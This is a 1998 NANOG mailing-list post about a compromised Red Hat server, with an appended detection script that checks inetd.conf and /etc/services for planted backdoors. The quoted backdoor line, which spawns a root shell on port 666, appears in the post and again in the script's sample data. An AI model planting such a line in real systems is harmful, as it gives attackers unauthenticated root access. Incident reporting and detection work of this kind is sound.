[21912] in North American Network Operators' Group
Re: IMAP attacks continue
daemon@ATHENA.MIT.EDU (Phil Howard)
Mon Nov 23 17:05:08 1998
From: Phil Howard <phil@whistler.intur.net>
To: nanog@merit.edu
Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST)
In-Reply-To: <199811231339.HAA02711@whistler.intur.net> from "Phil Howard" at Nov 23, 98 07:39:57 am
An addendum to:
> I found a machine that had Red Hat 5.1 unmodified running on it, and it
> got hit. So I closed things off and looked around for damage and found
> the following:
>
> 1. Syslogd had been killed off and the syslog file deleted.
>
> 2. A backdoor was installed in /etc/inetd.conf as follows:
>
> ttalk stream tcp nowait root /bin/sh sh -i
I checked the port assignments from IANA and there is no such thing as
"ttalk". I found this line in /etc/services:
ttalk 666/tcp
so it appears to be hijacking the port used by (as seen in the file
ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):
mdqs 666/tcp
mdqs 666/udp
doom 666/tcp doom Id Software
doom 666/udp doom Id Software
So also check /etc/services on any potentially compromised machines.
--
-- *-----------------------------* Phil Howard KA9WGN * --
-- | Inturnet, Inc. | Director of Internet Services | --
-- | Business Internet Solutions | eng at intur.net | --
-- *-----------------------------* philh at intur.net * --
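The two checks the message recommends (an inetd.conf entry that hands a root shell to anyone who connects, and a service name planted in /etc/services on a port IANA assigns to something else), written out as an added example; this is not code from the original post. The three sample files are constructed to mirror what the post describes, and the temporary-directory path is an assumption: on a suspect box you would point the functions at /etc/inetd.conf, /etc/services and a trusted copy of the IANA port-numbers list.

```shell
#!/bin/sh
# Added example, not code from the original post. The sample files below
# are constructed; on a real machine pass the real /etc files instead.

# List inetd.conf entries whose server program is a shell, i.e. the shape
# of the backdoor in the post: "ttalk stream tcp nowait root /bin/sh sh -i".
# Fields: name socktype proto wait/nowait user program [args...]
find_inetd_shells() {
    awk '
        /^[ \t]*#/ || NF < 6 { next }
        {
            prog = $6; args = ""
            for (i = 7; i <= NF; i++) args = args " " $i
            if (prog ~ /(^|\/)(ba|k|c|tc|z)?sh$/)
                printf "%s %s %s%s\n", $1, $5, prog, args
        }' "$1"
}

# Compare a services file against an IANA-style reference (name port/proto ...).
# Reports entries whose port/proto is unassigned, or assigned to another name.
find_unassigned_services() {
    services=$1; reference=$2
    awk '
        /^[ \t]*#/ || NF < 2 { next }
        NR == FNR { ref[$2] = ref[$2] " " $1; next }    # reference file is read first
        {
            known = ref[$2]
            if (known == "") verdict = "port not assigned in reference"
            else if (index(" " known " ", " " $1 " ") == 0) verdict = "assigned to" known
            else next
            printf "%s %s: %s\n", $1, $2, verdict
        }' "$reference" "$services"
}

# Constructed sample data (assumption: a scratch directory from mktemp).
WORK=$(mktemp -d)
cat > "$WORK/inetd.conf" <<'EOF'
# constructed sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
ttalk   stream  tcp     nowait  root    /bin/sh sh -i
EOF
cat > "$WORK/services" <<'EOF'
# constructed sample /etc/services
ftp     21/tcp
telnet  23/tcp
ttalk   666/tcp
EOF
cat > "$WORK/port-numbers" <<'EOF'
# constructed excerpt of the IANA port-numbers list
ftp     21/tcp
telnet  23/tcp
mdqs    666/tcp
mdqs    666/udp
doom    666/tcp  doom Id Software
doom    666/udp  doom Id Software
EOF

echo "== inetd.conf entries that spawn a shell =="
find_inetd_shells "$WORK/inetd.conf"
echo "== /etc/services entries that disagree with the reference =="
find_unassigned_services "$WORK/services" "$WORK/port-numbers"
```

The first function keys on the server program rather than the service name, because the name is whatever the intruder chose; the second reports both a port that the reference does not assign at all and a port assigned to a different name, since either is worth a look on a machine you already distrust. Run both against copies taken from known-good media as well, so a tampered awk or sh on the compromised host cannot hide the result.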